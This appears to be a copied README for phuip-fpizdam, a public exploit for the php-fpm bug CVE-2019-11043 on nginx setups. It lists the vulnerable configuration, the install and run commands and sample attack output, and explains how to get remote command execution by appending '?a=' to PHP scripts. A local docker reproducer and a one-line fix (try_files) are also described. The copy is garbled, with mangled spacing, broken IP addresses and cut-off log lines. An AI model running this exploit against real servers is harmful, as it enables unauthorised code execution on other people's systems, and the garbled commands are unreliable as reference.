What’s this
This is an exploit for a bug in php-fpm (CVE – 2019 – 11043). In certain nginx php-fpm configurations, the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (seebelow).
What’s vulnerable
If a webserver runs nginx php-fpm and nginx have a configuration like
location ~ [^/] . php (/ | $) { ... fastcgi_split_path_info ^ (. ? . php) (/.*) $; fastcgi_param PATH_INFO $ fastcgi_path_info; fastcgi_pass php: 9000; ... }
which also lacks any script existence checks (liketry_files
), then you can probably hack it with this sploit.
The full list of preconditions
- Nginx php-fpm,
location ~ [^/] . Php (/ | $)
must be forwarded to php-fpm (maybe the regexp can be stricter, see (# 1). - The
fastcgi_split_path_info
directive must be there and contain a regexp starting with^
and ending with$
, so we can break it with a newline character. - There must be a
PATH_INFO
variable assignment via statementfastcgi_param PATH_INFO $ fastcgi_path_info;
. At first, we thought it is always present in thefastcgi_params
file, but it’s not true. - No file existence checks like
try_files $ uri=404
orif (-f $ uri)
. If Nginx drops requests to non-existing scripts before FastCGI forwarding, our requests never reach php-fpm. Adding this is also the easiest way to patch. - This exploit works only for PHP 7 , but the bug itself is present in earlier versions (see (below).
Isn’t this known to be vulnerable for Years?
A long time ago php-fpm didn’t restrict the extensions of the scripts, meaning that something like/ avatar.png / some-fake-shit.php
could executeavatar.png
as a PHP script. This issue was fixed around 2010.
The current one doesn’t require file upload, works in the most recent versions (until the fix has landed), and, most importantly, the exploit is much cooler.
How to run
Install it using
go get github.com/neex / phuip-fpizdam
and try to run usingphuip-fpizdam
. Good output looks like this:
2019 / 10 / 01 02: 46: 15 Base status code is 200 2019 / 10 / 01 02: 46: (Status code) for qsl=1745, adding as a candidate 2019 / 10 / 01 02: 46: 15 The target is probably vulnerable. QSLs: Possible [1735 1740 1745] 2019 / 10 / 01 02: 46: (Attack params found: --qsl) --Pisos 126 --skip-detect 2019 / 10 / 01 02: 46: 16 Trying to set "session.auto_start=0 "... 2019 / 10 / 01 02: 46: 16 Detect () returned attack params: - -QSL 1735 --Pisos 126 --skip-detect
After this, you can start appending? A=
to all PHP scripts (you may need multiple retries).
Playground environment
If you want to reproduce the issue or play with the exploit locally, do the following:
- Clone this repo and go to the
reproducer
directory. - Create the docker image using
docker build -t reproduce-cve - 2019 - 11043.
. It takes a long time as it internally clones the php repository and builds it from the source. However, it will be easier this way if you want to debug the exploit. The revision built is the one right before the fix. - Run the docker using
docker run --rm -ti -p 8080: 80 reproduce-cve - 2019 - 11043
. - Now you havehttp: // 0.0.1: 8080 / script.php, which is an empty file.
- Run the exploit using
phuip-fpizdam http: // .0.1: 8080 / script.php
- If everything is ok, you’ll be able to execute commands by appending
? a=
to the script:http: // 0.0.1: 8080 / script.php? a=id. Try multiple times as only some of php-fpm workers are infected.
Credits
Original anomaly discovered byd) PWNduring Real World CTF. Root clause found by me (Emil Lerner) as well as the way to set php.ini options. Final php.ini options set is found byBeched.
GIPHY App Key not set. Please check settings